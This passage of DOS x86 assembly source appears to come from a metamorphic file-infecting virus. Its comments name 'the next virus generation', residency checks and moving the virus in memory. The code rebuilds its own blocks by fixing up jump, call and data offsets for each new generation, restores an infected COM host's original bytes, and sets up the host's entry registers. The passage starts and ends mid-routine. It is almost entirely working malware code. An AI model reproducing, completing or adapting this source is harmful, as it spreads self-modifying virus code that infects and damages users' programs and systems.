db 01110011b+10000000b ; Above or equal? Jump to examine_...
|
|||
|
dw 0bebh ; Pointer to examine_nex
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be0h ; Pointer to decrypt_byt
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub al,10h ; AL = length of message
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,00h ; Zero AH
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
add si,ax ; SI = offset of end of message
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bebh ; Pointer to examine_nex
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_probab db 11101110b ; Beginning of block
|
|||
|
dw 0bedh ; Block identification of exam_pro...
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,0bech ; Block identification of probabi...?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to examine_nex
|
|||
|
dw 0bebh ; Pointer to examine_nex
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov ax,[bp+1234h] ; AX = probability_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bech ; Pointer to probability_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec ax ; Decrease probability
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,05h ; Probability too small?
|
|||
|
|
|||
|
db 01110011b+10000000b ; Above or equal? Jump to store_pr...
|
|||
|
dw 0bf5h ; Pointer to store_proba
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,64h ; Reset probability
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bf5h ; Pointer to store_proba
|
|||
|
db 11101111b ; End of block
|
|||
|
store_proba db 11101110b ; Beginning of block
|
|||
|
dw 0bf5h ; Block identification of store_pr...
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov es:[bx],ax ; Store probability
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add bx,02h ; Add two to offset within next vi...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add si,03h ; SI = offset of beginning of next...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bebh ; Pointer to examine_nex
|
|||
|
db 11101111b ; End of block
|
|||
|
examine_nex db 11101110b ; Beginning of block
|
|||
|
dw 0bebh ; Block identification of examine_...
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop di ; Load DI from stack
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be0h ; Pointer to decrypt_byt
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bc2h ; Pointer to exam_bl__
|
|||
|
db 11101111b ; End of block
|
|||
|
sto_call_jm_ db 11101110b ; Beginning of block
|
|||
|
dw 0bc7h ; Block identification of sto_call...
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push di ; Save DI at stack
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov di,es:[06h] ; DI = offset within CALL; JMP; Jc...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ax,bx ; AX = offset within next virus ge...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosw ; Store offset within next virus g...
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be1h ; Pointer to decrypt_id_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosw ; Store block identification
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov es:[06h],di ; Store offset within CALL; JMP; J...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop di ; Load DI from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load AX from stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add bx,03h ; Add three to offset within next ...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11110000b ; Jump condition?
|
|||
|
|
|||
|
db 01110010b+10000000b ; Below? Jump to exam_bl_
|
|||
|
dw 0bc1h ; Pointer to exam_bl_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc bx ; Increase offset within next viru...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc bx ; Increase offset within next viru...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bc1h ; Pointer to exam_bl_
|
|||
|
db 11101111b ; End of block
|
|||
|
split_bloc_ db 11101110b ; Beginning of block
|
|||
|
dw 0bc8h ; Block identification of split_bloc_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov es:[di+02h],bx ; Store offset within next virus g...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add bx,03h ; Add three to offset within next ...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bc9h ; Pointer to end_of_bloc
|
|||
|
db 11101111b ; End of block
|
|||
|
end_of_bloc db 11101110b ; Beginning of block
|
|||
|
dw 0bc9h ; Block identification of end_of_b...
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec si ; Decrease offset of block within ...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov es:[di],si ; Store offset of block within table
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bbdh ; Pointer to split_bloc
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_tbl_in db 11101110b ; Beginning of block
|
|||
|
dw 0bcah ; Block identification of exam_tbl...
|
|||
|
db 06h ; Six bytes instruction
|
|||
|
|
|||
|
cmp word ptr es:[0ch],00h
|
|||
|
|
|||
|
db 01110101b+10000000b ; End of second table? Jump to cor...
|
|||
|
dw 0fa1h ; Pointer to correc_i16
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop si ; Load SI from stack
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov es:[0ch],bx ; Store offset within next virus g...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
add si,(second_table-first_table)
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0fa0h ; Pointer to initial_tmc_
|
|||
|
db 11101111b ; End of block
|
|||
|
correc_i16 db 11101110b ; Beginning of block
|
|||
|
dw 0fa1h ; Block identification of correc_i16
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push es ; Save ES at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ds ; Load DS from stack (ES)
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
sub bx,4000h ; Subtract offset of next virus ge...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov ds:[0eh],bx ; Store length of virus
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,2000h ; SI = offset of CALL; JMP; Jcc im...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub cx,si ; Subtract offset of CALL; JMP; Jc...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr cx,01h ; Divide number of CALL imm16; JMP...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr cx,01h ; Divide number of CALL imm16; JMP...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bcbh ; Pointer to jmp_call_lo
|
|||
|
db 11101111b ; End of block
|
|||
|
jmp_call_lo db 11101110b ; Beginning of block
|
|||
|
dw 0bcbh ; Block identification of jmp_call...
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
lodsw ; AX = offset of block within data...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
lodsw ; AX = offset of block within data...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push si ; Save SI at stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,1000h ; SI = offset of block information
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,ds:[04h] ; CX = offset of end of block info...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub cx,si ; Subtract offset of block informa...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr cx,01h ; Divide number of block by two
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr cx,01h ; Divide number of block by two
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bcch ; Pointer to find_block__
|
|||
|
db 11101111b ; End of block
|
|||
|
find_block__ db 11101110b ; Beginning of block
|
|||
|
dw 0bcch ; Block identification of find_blo...
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,[si+02h] ; Found block?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to found_bloc
|
|||
|
dw 0bcdh ; Pointer to found_bloc
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add si,04h ; SI = offset of next block in table
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec cx ; Decrease counter
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not zero? Jump to find_block__
|
|||
|
dw 0bcch ; Pointer to find_block__
|
|||
|
db 11101111b ; End of block
|
|||
|
found_bloc db 11101110b ; Beginning of block
|
|||
|
dw 0bcdh ; Block identification of found_bloc
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov dx,[si] ; DX = offset of block
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop si ; Load SI from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop cx ; Load CX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop bx ; Load BX from stack (AX)
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov al,[bx] ; AL = first byte of instruction
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11110000b ; Jump condition?
|
|||
|
|
|||
|
db 01110010b+10000000b ; Below? Jump to sto_call_j
|
|||
|
dw 0bcfh ; Pointer to sto_call_j
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
sub byte ptr [bx],10000000b
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc bx ; BX = offset of 8-bit immediate
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push dx ; Save DX at stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub dx,bx ; Subtract offset within next viru...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec dx ; Decrease 8-bit immediate
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp dx,7fh ; 8-bit immediate out of range?
|
|||
|
|
|||
|
db 01111111b+10000000b ; Greater? Jump to invert_jcc_
|
|||
|
dw 0bceh ; Pointer to invert_jcc_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp dx,0ff80h ; 8-bit immediate out of range?
|
|||
|
|
|||
|
db 01111100b+10000000b ; Less? Jump to invert_jcc_
|
|||
|
dw 0bceh ; Pointer to invert_jcc_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov [bx],dl ; Store 8-bit immediate
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc bx ; BX = offset of end of Jcc imm8
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [bx],1001000010010000b
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov byte ptr [bx+02h],10010000b
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop dx ; Load DX from stack
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bd0h ; Pointer to correc_i16_
|
|||
|
db 11101111b ; End of block
|
|||
|
invert_jcc_ db 11101110b ; Beginning of block
|
|||
|
dw 0bceh ; Block identification of invert_jcc_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop dx ; Load DX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec bx ; BX = offset of Jcc imm8
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
xor byte ptr [bx],00000001b
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc bx ; BX = offset of 8-bit immediate
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov byte ptr [bx],03h ; Store 8-bit immediate
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc bx ; BX = offset of JMP imm16
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov al,11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bcfh ; Pointer to sto_call_j
|
|||
|
db 11101111b ; End of block
|
|||
|
sto_call_j db 11101110b ; Beginning of block
|
|||
|
dw 0bcfh ; Block identification of sto_call...
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov [bx],al ; Store CALL imm16; JMP imm16
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc bx ; BX = offset of 16-bit immediate
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub dx,bx ; Subtract offset within next viru...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec dx ; Decrease 16-bit immediate
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec dx ; Decrease 16-bit immediate
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov [bx],dx ; Store 16-bit immediate
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bd0h ; Pointer to correc_i16_
|
|||
|
db 11101111b ; End of block
|
|||
|
correc_i16_ db 11101110b ; Beginning of block
|
|||
|
dw 0bd0h ; Block identification of correc_...
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec cx ; Decrease counter
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not zero? Jump to jmp_call_lo
|
|||
|
dw 0bcbh ; Pointer to jmp_call_lo
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,3000h ; SI = offset of data information
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,ds:[08h] ; CX = offset of end of data infor...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub cx,si ; Subtract offset of data informat...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr cx,01h ; Divide number of data references...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr cx,01h ; Divide number of data references...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bd1h ; Pointer to data_ref_lo
|
|||
|
db 11101111b ; End of block
|
|||
|
data_ref_lo db 11101110b ; Beginning of block
|
|||
|
dw 0bd1h ; Block identification of data_ref_lo
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
lodsw ; AX = offset of block within data...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
lodsw ; AX = offset of block within data...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push si ; Save SI at stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,1000h ; SI = offset of block information
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,ds:[04h] ; CX = offset of end of block info...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub cx,si ; Subtract offset of block informa...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr cx,01h ; Divide number of block by two
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr cx,01h ; Divide number of block by two
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bd2h ; Pointer to find_bloc
|
|||
|
db 11101111b ; End of block
|
|||
|
find_bloc db 11101110b ; Beginning of block
|
|||
|
dw 0bd2h ; Block identification to find_bloc
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,[si+02h] ; Found block?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to found_bloc_
|
|||
|
dw 0bd3h ; Pointer to found_bloc_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add si,04h ; SI = offset of next block in table
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec cx ; Decrease counter
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not zero? Jump to find_bloc
|
|||
|
dw 0bd2h ; Pointer to find_bloc
|
|||
|
db 11101111b ; End of block
|
|||
|
found_bloc_ db 11101110b ; Beginning of block
|
|||
|
dw 0bd3h ; Block identification of found_bloc_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ax,[si] ; AX = offset of block
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop si ; Load SI from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop cx ; Load CX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop bx ; Load BX from stack (AX)
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
sub ax,4000h ; Subtract offset of next virus ge...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov [bx],ax ; Store 16-bit immediate
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec cx ; Decrease counter
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not zero? Jump to data_ref_lo
|
|||
|
dw 0bd1h ; Pointer to data_ref_lo
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1772h ; Pointer to restore_cod
|
|||
|
db 11101111b ; End of block
|
|||
|
restore_cod db 11101110b ; Beginning of block
|
|||
|
dw 1772h ; Block identification of restore_...
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov ax,[bp+1234h] ; AX = segment of PSP for current ...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0befh ; Pointer to program_seg_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,[bp+1234h] ; CX = initial SS relative to star...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138ah ; Pointer to initial_ss_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add cx,10h ; Add ten to initial SS relative t...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
add cx,ax ; Add segment of PSP for current p...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
push [bp+1234h] ; Save initial SP at stack
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138ch ; Pointer to initial_sp_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,[bp+1234h] ; CX = initial CS relative to star...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1389h ; Pointer to initial_cs_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add cx,10h ; Add ten to initial CS relative t...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
add cx,ax ; Add segment of PSP for current p...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
push [bp+1234h] ; Save initial IP at stack
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138bh ; Pointer to initial_ip_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save segment of PSP for current ...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
push [bp+1234h] ; Save size of memory block in par...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1395h ; Pointer to mcb_size__
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ds ; Save DS at stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov cl,00h ; COM executable
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
cmp [bp+1234h],cl ; COM executable?
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1388h ; Pointer to executa_sta
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to move_virus__
|
|||
|
dw 1390h ; Pointer to move_virus__
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
lea si,[bp+1234h] ; SI = offset of origin_code_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1f40h ; Pointer to origin_code_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,cs:[si] ; AX = first two bytes of original...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cs:[100h],ax ; Store first two bytes of origina...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov al,cs:[si+02h] ; AL = last byte of original code ...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cs:[100h+02h],al ; Store last byte of original code...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1390h ; Pointer to move_virus__
|
|||
|
db 11101111b ; End of block
|
|||
|
db 11101110b ; Beginning of block
|
|||
|
dw 1774h
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov ax,[bp+1234h] ; AX = segment of PSP for current ...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0befh ; Pointer to program_seg_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,[bp+1234h] ; CX = initial SS relative to star...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138ah ; Pointer to initial_ss_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add cx,10h ; Add ten to initial SS relative t...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
add cx,ax ; Add segment of PSP for current p...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
push [bp+1234h] ; Save initial SP at stack
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 138ch ; Pointer to initial_sp_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,[bp+1234h] ; CX = initial CS relative to star...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1389h ; Pointer to initial_cs_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add cx,10h ; Add ten to initial CS relative t...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
add cx,ax ; Add segment of PSP for current p...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
push [bp+1234h] ; Save incorrect IP at stack
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1773h ; Pointer to incorrec_ip
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save segment of PSP for current ...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
push [bp+1234h] ; Save size of memory block in par...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1395h ; Pointer to mcb_size__
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ds ; Save DS at stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov cl,00h ; COM executable
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
cmp [bp+1234h],cl ; COM executable?
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1388h ; Pointer to executa_sta
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to move_virus__
|
|||
|
dw 1390h ; Pointer to move_virus__
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
lea si,[bp+1234h] ; SI = offset of origin_code_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1f40h ; Pointer to origin_code_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,cs:[si] ; AX = first two bytes of original...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cs:[100h],ax ; Store first two bytes of origina...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov al,cs:[si+02h] ; AX = last byte of original code ...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cs:[100h+02h],al ; Store last byte of original code...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1390h ; Pointer to move_virus__
|
|||
|
db 11101111b ; End of block
|
|||
|
move_virus__ db 11101110b ; Beginning of block
|
|||
|
dw 1390h ; Block identification of move_vir...
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor ax,ax ; Zero AX
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ds,ax ; DS = segment of DOS communicatio...
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
cmp byte ptr ds:[501h],10h
|
|||
|
|
|||
|
db 01110100b+10000000b ; Already resident? Jump to virus_...
|
|||
|
dw 65h ; Pointer to virus_exit_
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov byte ptr ds:[501h],10h
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push es ; Save ES at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ds ; Load DS from stack (ES)
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,ds:[0ch] ; AX = offset within next virus ge...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
sub ax,4000h ; Subtract offset of next virus ge...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [bp+1234h],ax ; Store offset of crypt_table
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bf1h ; Pointer to vir_exit_of
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,ds:[0eh] ; CX = length of virus
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [bp+1234h],cx ; Store length of virus
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
